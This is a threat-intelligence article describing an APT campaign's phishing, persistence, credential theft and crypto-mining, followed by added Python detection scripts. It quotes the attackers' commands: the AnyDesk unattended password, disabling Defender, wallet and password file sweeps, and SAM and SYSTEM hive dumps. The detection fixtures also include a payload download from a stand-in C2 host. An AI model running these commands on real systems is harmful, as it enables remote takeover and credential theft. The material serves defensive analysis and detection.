Saturday, April 25, 2026

APT Group ‘Librarian Ghouls’ Launches Active Attacks on Organizations to Deploy Malware

A prominent advanced persistent threat (APT) group known as “Librarian Ghouls”, also referenced in recent security bulletins as “Rare Werewolf” and “Rezet”, has launched a wave of highly targeted cyberattacks against Russian and CIS-based organizations, as detailed in recent security research.

As of May 2025, these attacks continue unabated, with hundreds of victims reported, including industrial enterprises and educational institutions in Russia, Belarus, and Kazakhstan.

The group stands out for its sophisticated use of legitimate software and utilities, rather than custom malware binaries, to establish persistence, exfiltrate sensitive data, and deploy cryptocurrency miners on victims’ systems.

Technical Overview of the Attacks

Initial Infection and Payload Deployment

Librarian Ghouls’ main infection vector is carefully crafted phishing emails sent to targeted Russian-speaking organizations. These emails carry password-protected ZIP or RAR archives disguised as official business documents such as payment orders or invoices.

Recipients are instructed to open these attachments; the password for the archive is conveniently included within the email itself.

Once extracted, the archive contains a self-extracting installer (SFX) built using the Smart Install Maker tool for Windows. This installer unpacks several files onto the victim’s system:

  • data.cab (an archive containing additional payloads)
  • installer.config (a configuration file with malicious logic)
  • runtime.cab (an empty or decoy file)

Upon execution, the installer deploys a legitimate window-management utility, 4t Tray Minimizer, which can minimize application windows to the system tray; the attackers use it to keep the windows of their tools out of the victim’s sight. The software is installed in the background, and its presence passes as benign system activity.

File Deployments and Script Execution

The installer extracts files from data.cab into the C:\Intel directory. Notable files include:

  • Payment Order #131.pdf (a decoy document)
  • curl.exe (the legitimate curl utility for network transfers)
  • AnyDesk\bat.lnk (a shortcut leveraging the AnyDesk remote desktop tool)

Once unpacked, the installer executes a rezet.cmd command script. This script reaches out to the command-and-control (C2) server at downdown[.]ru and downloads files that are served with a .JPG extension, renaming them to their real names on disk:

  • driver.exe (a customized, silent version of WinRAR)
  • blat.exe (Blat, a utility for sending files via email)
  • svchost.exe (the legitimate AnyDesk remote access tool)
  • Trays.rar (an archive containing further components)
  • wol.ps1 (a PowerShell script for scheduling tasks)
  • dc.exe (Defender Control, for disabling Windows Defender)

The script then uses driver.exe to extract Trays.rar, which contains a shortcut to minimize 4t Tray Minimizer, further hiding malicious activity.

Installation of AnyDesk and Scheduled Tasks

The script installs AnyDesk and sets an unattended-access password, so the attackers can connect later without anyone at the keyboard approving the session:

echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access

To disable Windows Defender and ensure continued stealth:

%SYSTEMDRIVE%\Intel\dc.exe /D

A notable scheduled task is created to shut down the victim’s computer every day at 5 AM:

schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00

PowerShell Automation and Wake-up Script

A PowerShell script, wol.ps1, registers a task that launches Microsoft Edge every day at 1 AM as SYSTEM, with WakeToRun set so the machine is powered up from sleep. This innocuous-seeming action ensures the victim’s machine is awake during the attackers’ window of opportunity (between the 1 AM wake-up and the 5 AM shutdown):

# Action: start Edge
$Action = New-ScheduledTaskAction -Execute "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
# Fire every day at 01:00
$Trigger = New-ScheduledTaskTrigger -Daily -At "01:00AM"
# Run as SYSTEM with the highest run level, so no user needs to be logged on
$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
# WakeToRun wakes the machine from sleep; StartWhenAvailable runs the task late if the 01:00 slot was missed
$TaskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -WakeToRun
Register-ScheduledTask -Action $Action -Principal $Principal -Trigger $Trigger -TaskName "WakeUpAndLaunchEdge" -Settings $TaskSettings -Force

By waking the machine at 1 AM and leaving it running until the 5 AM shutdown, the attackers ensure it is available for remote control via AnyDesk during hours when nobody is likely to be watching the screen.
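To hunt for the two tasks above from Task Scheduler XML (the TaskContent field of Windows Security event 4698, or the output of schtasks /query /xml), here is an added Python example; it is not code from the article or from the group’s tooling. The sample task definitions, the local user SID and the “VendorUpdater” task are constructed, and treating 00:00 to 05:59 as the suspect window generalizes the 1 AM to 5 AM window described above.

```python
"""Triage Task Scheduler definitions for the persistence pattern above: a daily
forced shutdown, and a SYSTEM task with WakeToRun that starts a browser during
the night.  Input is the XML that Security event 4698 carries in TaskContent
(the same XML `schtasks /query /xml` prints).  Added example with constructed
sample tasks; not code from the article or from the group."""
import re
import xml.etree.ElementTree as ET

TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"
NS = {"t": TASK_NS}
SYSTEM_SID = "S-1-5-18"
BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe", "iexplore.exe"}
# The article describes a 1 AM wake and 5 AM shutdown; 00:00-05:59 is our broader suspect window.
NIGHT_HOURS = range(0, 6)


def _text(task, path):
    node = task.find(path, NS)
    return (node.text or "").strip() if node is not None else ""


def _start_hours(task):
    """Hour-of-day of every trigger StartBoundary (ISO 8601 local time)."""
    hours = []
    for sb in task.findall(".//t:Triggers//t:StartBoundary", NS):
        m = re.search(r"T(\d{2}):\d{2}", sb.text or "")
        if m:
            hours.append(int(m.group(1)))
    return hours


def triage_task(xml_text):
    """Return the reasons a task definition matches the pattern (empty list = nothing odd)."""
    task = ET.fromstring(xml_text)
    cmd = _text(task, ".//t:Actions/t:Exec/t:Command").lower()
    args = _text(task, ".//t:Actions/t:Exec/t:Arguments").lower()
    user = _text(task, ".//t:Principals/t:Principal/t:UserId").upper()
    wake = _text(task, ".//t:Settings/t:WakeToRun").lower() == "true"
    night = any(h in NIGHT_HOURS for h in _start_hours(task))
    reasons = []
    # schtasks /tr "shutdown /s /f /t 0" is stored as Command=shutdown, Arguments=/s /f /t 0
    if re.search(r"(^|\\)shutdown(\.exe)?$", cmd) and re.search(r"(^|\s)[/-]s(\s|$)", args):
        reasons.append("forced shutdown on a schedule")
    if cmd.rsplit("\\", 1)[-1] in BROWSERS and user in (SYSTEM_SID, "SYSTEM"):
        reasons.append("browser started as SYSTEM")
    if wake and night:
        reasons.append("WakeToRun with start in 00:00-05:59")
    return reasons


def triage_events(events):
    """{TaskName: reasons} for every 4698-style record whose TaskContent trips a rule."""
    out = {}
    for ev in events:
        reasons = triage_task(ev["TaskContent"])
        if reasons:
            out[ev["TaskName"]] = reasons
    return out


def _task_xml(start, user_sid, wake, command, arguments=""):
    """Minimal Task Scheduler XML in the shape 4698 TaskContent uses (constructed sample builder)."""
    logon = "ServiceAccount" if user_sid == SYSTEM_SID else "InteractiveToken"
    wake_s = "true" if wake else "false"
    return f"""<Task version="1.4" xmlns="{TASK_NS}">
  <Triggers><CalendarTrigger>
    <StartBoundary>{start}</StartBoundary><Enabled>true</Enabled>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
  </CalendarTrigger></Triggers>
  <Principals><Principal id="Author">
    <UserId>{user_sid}</UserId><LogonType>{logon}</LogonType><RunLevel>HighestAvailable</RunLevel>
  </Principal></Principals>
  <Settings><WakeToRun>{wake_s}</WakeToRun><StartWhenAvailable>true</StartWhenAvailable></Settings>
  <Actions Context="Author"><Exec><Command>{command}</Command><Arguments>{arguments}</Arguments></Exec></Actions>
</Task>"""


USER_SID = "S-1-5-21-1004336348-1177238915-682003330-1001"  # constructed local user SID
SAMPLE_4698_EVENTS = [  # constructed records: TaskName + TaskContent as Security 4698 logs them
    {"TaskName": "\\ShutdownAt5AM",
     "TaskContent": _task_xml("2025-05-12T05:00:00", USER_SID, False, "shutdown", "/s /f /t 0")},
    {"TaskName": "\\WakeUpAndLaunchEdge",
     "TaskContent": _task_xml("2025-05-12T01:00:00", SYSTEM_SID, True,
                              r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe")},
    {"TaskName": "\\VendorUpdater",  # benign daytime task for contrast
     "TaskContent": _task_xml("2025-05-12T13:00:00", USER_SID, False,
                              r"C:\Program Files\Vendor\Updater.exe", "/silent")},
]

if __name__ == "__main__":
    for name, reasons in triage_events(SAMPLE_4698_EVENTS).items():
        print(f"{name}: {'; '.join(reasons)}")
```

The three checks are deliberately independent: a scheduled shutdown alone is unusual on a workstation, a browser running as SYSTEM has no legitimate purpose, and a WakeToRun task that fires in the small hours is worth a look even when its action is something other than Edge. Feeding real 4698 events means pulling TaskContent out of the event’s EventData and passing it to triage_task unchanged.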

Data Exfiltration and Credential Theft

The group’s BAT scripts collect sensitive data using driver.exe, the customized WinRAR build (a -r adds the matching files recursively to a password-protected archive; the password switch is redacted below):

%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*парол*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*карт*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*кошельк*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*wallet*.doc* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*seed*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*bitcoin*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*ethereum*.* /y
reg save hklm\sam %SYSTEMDRIVE%\Intel\sam.backup
reg save hklm\system %SYSTEMDRIVE%\Intel\system.backup

These commands sweep the C: drive for files whose names contain the Russian stems for password (парол), card (карт) and wallet (кошельк), as well as wallet, seed, bitcoin and ethereum, and add them to a password-protected RAR archive. The SAM and SYSTEM registry hives are also saved: together they let the attackers extract local account password hashes offline, since the SYSTEM hive holds the boot key needed to decrypt the SAM.
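As an added example that is not from the article or from the group’s scripts, the following Python runs behavioural detections for the command lines shown in the last two sections (the AnyDesk unattended password, Defender Control, the shutdown task, RAR collection into C:\Intel, the wallet and password keyword sweep, SAM/SYSTEM hive saves, and a .jpg download written out as an executable) over constructed process-creation records of the kind Sysmon event 1 or Security event 4688 produce. The host names, the RAR -hp switch, the curl -o form and the c2.example URL are assumptions; the .jpg rule assumes curl.exe is the downloader, which the article implies by dropping curl but does not show.

```python
"""Behavioural detections for the living-off-the-land chain described above,
run over constructed process-creation records (host + command line).  Added
example; not Kaspersky's or the group's code.  Switches in the sample lines
(the RAR -hp password, the curl -o form, the c2.example URL) are assumptions."""
import re
from collections import defaultdict

# Rule name -> pattern over the full command line, in the order the chain uses them.
RULES = {
    "anydesk_unattended_password": re.compile(
        r"--set-password\s+_unattended_access", re.I),
    "defender_control_disable": re.compile(
        r"\bdc\.exe\s+/d\b", re.I),
    "scheduled_forced_shutdown": re.compile(
        r"\bschtasks(?:\.exe)?\s+/create\b.*\bshutdown\s+/s\b", re.I),
    "rar_collection_to_intel_dir": re.compile(
        r"\.exe\"?\s+a\s+-r\b.*\\Intel\\\S+\.rar\b", re.I),
    "wallet_credential_keywords": re.compile(
        r"\*(?:парол|карт|кошельк|wallet|seed|bitcoin|ethereum)\*", re.I),
    "registry_hive_save": re.compile(
        r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b", re.I),
    # Assumption: curl fetches the .jpg-named payload and writes it under an executable name.
    "jpg_download_saved_as_executable": re.compile(
        r"\bcurl(?:\.exe)?\b(?=.*\s-o\s+\S+\.(?:exe|ps1|rar|cmd)\b)(?=.*https?://\S+\.jpg\b)", re.I),
}
HIVE_RX = re.compile(r"hklm\\(sam|system)\b", re.I)


def match_rules(cmdline):
    """Names of every rule the command line trips, in RULES order."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def detect(events):
    """{host: {rule: [cmdline, ...]}} for every host with at least one hit."""
    hits = defaultdict(lambda: defaultdict(list))
    for ev in events:
        for name in match_rules(ev["CommandLine"]):
            hits[ev["Host"]][name].append(ev["CommandLine"])
    return {host: dict(rules) for host, rules in hits.items()}


def hive_theft_hosts(hits):
    """Hosts where both SAM and SYSTEM were saved; a lone SYSTEM save is not enough for offline hashes."""
    out = []
    for host, rules in hits.items():
        saved = {m.group(1).lower()
                 for cmd in rules.get("registry_hive_save", [])
                 for m in HIVE_RX.finditer(cmd)}
        if {"sam", "system"} <= saved:
            out.append(host)
    return sorted(out)


SAMPLE_EVENTS = [  # constructed telemetry: one compromised host, one host with only benign admin activity
    {"Host": "WS-ACCT-07", "CommandLine": r'C:\Intel\curl.exe -s -o C:\Intel\driver.exe http://c2.example/driver.jpg'},
    {"Host": "WS-ACCT-07", "CommandLine": r'cmd.exe /c echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access'},
    {"Host": "WS-ACCT-07", "CommandLine": r'C:\Intel\dc.exe /D'},
    {"Host": "WS-ACCT-07", "CommandLine": r'schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00'},
    {"Host": "WS-ACCT-07", "CommandLine": r'C:\Intel\driver.exe a -r -hpSecret1 C:\Intel\wallet.rar C:\*парол*.* /y'},
    {"Host": "WS-ACCT-07", "CommandLine": r'reg save hklm\sam C:\Intel\sam.backup'},
    {"Host": "WS-ACCT-07", "CommandLine": r'reg save hklm\system C:\Intel\system.backup'},
    {"Host": "WS-ENG-12", "CommandLine": r'C:\Windows\System32\svchost.exe -k netsvcs -p'},
    {"Host": "WS-ENG-12", "CommandLine": r'"C:\Program Files\7-Zip\7z.exe" a -r C:\Backups\docs.7z C:\Users\ivan\Documents\*.docx'},
    {"Host": "WS-ENG-12", "CommandLine": r'reg save hklm\system C:\Temp\system.hiv'},
]

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for host, rules in hits.items():
        print(host, sorted(rules))
    print("SAM+SYSTEM saved on:", hive_theft_hosts(hits))
```

The single-line rules are intentionally narrow (the archive has to land under C:\Intel, the keyword sweep has to use the group’s wildcards), so a backup job with 7-Zip does not fire them; the one broad rule, registry_hive_save, is promoted to a finding only when SAM and SYSTEM are saved on the same host. Command-line auditing must be enabled (Sysmon, or 4688 with “Include command line in process creation events”) for any of this to have data to run on.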

Miner Deployment and Cleanup

The script then deploys a cryptocurrency miner. It downloads and runs an installer from hxxp://bmapps[.]org/bmcontrol/win64/Install.exe, which in turn fetches an archive containing the mining components:

  • bmcontrol.exe (the miner controller)
  • run.exe, stop.cmd, uninstall.cmd (tools for starting, stopping, and removing the controller)
  • the XMRig miner

The miner is configured via a bm.json file, which includes pool information and the attacker’s ID. The controller (bmcontrol.exe) runs persistently, monitoring the mining process and restarting it if it fails.

Before self-deleting, the BAT script removes traces of the attack from the victim’s system.

Attackers’ Use of Legitimate Tools and Evasion Tactics

Librarian Ghouls stands out for its heavy reliance on legitimate third-party software to avoid detection and attribution. Tools such as Mipko Personal Monitor, WebBrowserPassView, ngrok, and NirCmd are used for data exfiltration, credential theft, and persistence. This “living off the land” approach complicates attribution and detection, as the tools themselves are not malicious.

Phishing and Infrastructure

The group maintains phishing portals at domains like users-mail[.]ru and deauthorization[.]online, designed to harvest credentials for the mail.ru email service. Their C2 infrastructure is hosted at downdown[.]ru and dragonfires[.]ru, both resolving to 185.125.51[.]5.

Ongoing Threat and Mitigation

As of May 2025, Librarian Ghouls remains active, with frequent updates to their implant configurations and a large collection of sample files (over 100 identified).

Organizations in Russia and the CIS should stay vigilant: training employees to recognize phishing, monitoring for unusual scheduled tasks or network traffic, and applying strict endpoint controls can mitigate the risk.

Security teams should be aware of the use of legitimate tools for malicious purposes, and watch for indicators such as unexpected installations of AnyDesk, 4t Tray Minimizer, or the presence of suspicious files in the C:\Intel directory.

Indicators of compromise

Implants

d8edd46220059541ff397f74bfd271336dda702c6b1869e8a081c71f595a9e68
2f3d67740bb7587ff70cc7319e9fe5c517c0e55345bf53e01b3019e415ff098b
de998bd26ea326e610cc70654499cebfd594cc973438ac421e4c7e1f3b887617
785a5b92bb8c9dbf52cfda1b28f0ac7db8ead4ec3a37cfd6470605d945ade40e
c79413ef4088b3a39fe8c7d68d2639cc69f88b10429e59dd0b4177f6b2a92351
53fd5984c4f6551b2c1059835ea9ca6d0342d886ba7034835db2a1dd3f8f5b04
